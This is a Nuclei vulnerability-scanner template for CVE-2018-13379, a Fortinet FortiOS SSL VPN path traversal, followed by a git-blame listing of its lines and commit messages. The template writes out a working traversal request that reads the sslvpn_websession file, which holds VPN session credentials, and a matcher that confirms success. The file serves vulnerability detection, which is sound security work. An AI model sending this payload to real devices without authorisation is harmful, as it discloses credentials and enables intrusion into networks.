nuclei-templates/cves/2018/CVE-2018-13379.yaml

id: CVE-2018-13379

info:
  name: Fortinet FortiOS - Credentials Disclosure
  author: organiccrap
  severity: critical
  description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
  reference:
    - https://fortiguard.com/advisory/FG-IR-18-384
    - https://www.fortiguard.com/psirt/FG-IR-20-233
    - 
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-13379
    cwe-id: CWE-22
  tags: cve,cve2018,fortios

requests:
  - method: GET
    path:
      - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    matchers:
      - type: word
        words:
          - "var fgt_lang"

# Enhanced by mp on 2022/05/12
misc changes 2021-01-02 05:00:39 +00:00			`id: CVE-2018-13379`
pending pull 2020-04-22 06:42:01 +00:00
			`info:`
Enhancement: cves/2018/CVE-2018-13379.yaml by mp 2022-05-12 19:36:07 +00:00			`name: Fortinet FortiOS - Credentials Disclosure`
pending pull 2020-04-22 06:42:01 +00:00			`author: organiccrap`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: critical`
Enhancement: cves/2018/CVE-2018-13379.yaml by mp 2022-05-12 19:36:07 +00:00			`description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://fortiguard.com/advisory/FG-IR-18-384`
			`- https://www.fortiguard.com/psirt/FG-IR-20-233`
Enhancement: cves/2018/CVE-2018-13379.yaml by mp 2022-05-12 19:36:07 +00:00			`-`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2018-13379`
			`cwe-id: CWE-22`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2018,fortios`
pending pull 2020-04-22 06:42:01 +00:00
			`requests:`
			`- method: GET`
Update syntax 2020-05-25 07:49:06 +00:00			`path:`
CVE-2018-13379 traversal path is corrected 2021-04-20 23:15:12 +00:00			`- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"`
pending pull 2020-04-22 06:42:01 +00:00			`matchers:`
			`- type: word`
Update syntax 2020-05-25 07:49:06 +00:00			`words:`
:pencil2: Update default path 2021-02-23 20:47:27 +00:00			`- "var fgt_lang"`
Enhancement: cves/2018/CVE-2018-13379.yaml by mp 2022-05-12 19:36:07 +00:00
			`# Enhanced by mp on 2022/05/12`